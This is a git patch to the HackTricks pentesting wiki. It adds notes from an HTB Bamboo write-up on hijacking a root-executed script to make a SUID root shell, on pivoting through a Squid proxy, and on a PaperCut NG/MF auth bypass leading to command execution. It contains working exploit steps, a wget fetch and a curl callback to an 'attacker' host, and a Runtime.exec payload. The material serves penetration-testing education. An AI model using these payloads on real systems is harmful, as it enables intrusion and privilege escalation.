From 8169c4137b9a84f3be44d1309ef510defff4c14e Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 3 Feb 2026 13:01:30 +0000 Subject: [PATCH] Add content from: HTB: Bamboo --- .../privilege-escalation/write-to-root.md | 32 +++++++++++++++++++ .../3128-pentesting-squid.md | 30 ++++++++++++++++- src/pentesting-web/command-injection.md | 18 ++++++++++- 3 files changed, 78 insertions(+), 2 deletions(-) diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md index f88fa99d382..c4c06fb42a2 100644 --- a/src/linux-hardening/privilege-escalation/write-to-root.md +++ b/src/linux-hardening/privilege-escalation/write-to-root.md @@ -60,6 +60,38 @@ Name=Evil Desktop Entry For more info check [**this post**](https://chatgpt.com/c/67fac01f-0214-8006-9db3-19c40e45ee49) where it was used to exploit a real vulnerability. +### Root executing user-writable scripts/binaries + +If a privileged workflow runs something like `/bin/sh /home/username/.../script` (or any binary inside a directory owned by an unprivileged user), you can hijack it: + +- **Detect the execution:** monitor processes with [pspy](https://github.com/DominicBreuker/pspy) to catch root invoking user-controlled paths: + +```bash +wget http://attacker/pspy64 -O /dev/shm/pspy64 +chmod +x /dev/shm/pspy64 +/dev/shm/pspy64 # wait for root commands pointing to your writable path +``` + +- **Confirm writeability:** ensure both the target file and its directory are owned/writable by your user. +- **Hijack the target:** backup the original binary/script and drop a payload that creates a SUID shell (or any other root action), then restore permissions: + +```bash +mv server-command server-command.bk +cat > server-command <<'EOF' +#!/bin/bash +cp /bin/bash /tmp/rootshell +chown root:root /tmp/rootshell +chmod 6777 /tmp/rootshell +EOF +chmod +x server-command +``` + +- **Trigger the privileged action** (e.g., pressing a UI button that spawns the helper). When root re-executes the hijacked path, grab the escalated shell with `./rootshell -p`. + +## References + +- [HTB Bamboo – hijacking a root-executed script in a user-writable PaperCut directory](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md index 76c46637cb6..82109a0059a 100644 --- a/src/network-services-pentesting/3128-pentesting-squid.md +++ b/src/network-services-pentesting/3128-pentesting-squid.md @@ -42,7 +42,35 @@ Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.c python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 ``` -{{#include ../banners/hacktricks-training.md}} +### Pivot & tooling configuration + +*Use Squid as a discovery pivot and a transparent upstream hop for CLI and browser tools.* + +- **Scan “from” the proxy:** run SPOSE through Squid to enumerate ports reachable from the proxy host/loopback. With [uv](https://github.com/astral-sh/uv) you can install deps and scan all TCP ports directly: + +```bash +uv add --script spose.py -r requirements.txt +uv run spose.py --proxy http://SQUID_IP:3128 --target localhost --allports +``` +- **Proxychains for HTTP interaction:** append a strict HTTP entry at the bottom of `/etc/proxychains.conf`: + +```ini +[ProxyList] +http SQUID_IP 3128 +``` +Then interact with internal listeners (e.g., a web UI bound to 127.0.0.1) transparently through Squid: +```bash +proxychains curl http://127.0.0.1:9191 -v +``` + +- **Chaining Burp/Browser → Squid:** configure Burp *Proxy → Settings → Network → Connections → Upstream proxy servers* to point to `http://SQUID_IP:3128`. Requests to internal hosts such as `http://127.0.0.1:9191` will traverse Browser → Burp → Squid → target, enabling full interception of services otherwise not reachable externally. + +## References + +- [SPOSE – Squid Pivoting Open Port Scanner](https://github.com/aancw/spose) +- [HTB Bamboo walkthrough (Squid pivoting example)](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) + +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index dc2b2c0b8ee..fab61eb2a4d 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md @@ -206,6 +206,21 @@ Example payloads: Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution. +## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE + +- Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow). +- In **Options → Config Editor**, set `print-and-device.script.enabled=Y` and `print.script.sandboxed=N` to turn on printer scripting and disable the sandbox. +- In the printer **Scripting** tab, enable the script and keep `printJobHook` defined to avoid validation errors, but place the payload **outside** the function so it executes immediately when you click **Apply** (no print job needed): + +```js +function printJobHook(inputs, actions) {} +cmd = ["bash","-c","curl http://attacker/hit"]; +java.lang.Runtime.getRuntime().exec(cmd); +``` + +- Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request. +- Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally. + ## Brute-Force Detection List @@ -216,7 +231,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject ## References -- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) @@ -224,5 +238,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/) +- [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) +- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) {{#include ../banners/hacktricks-training.md}}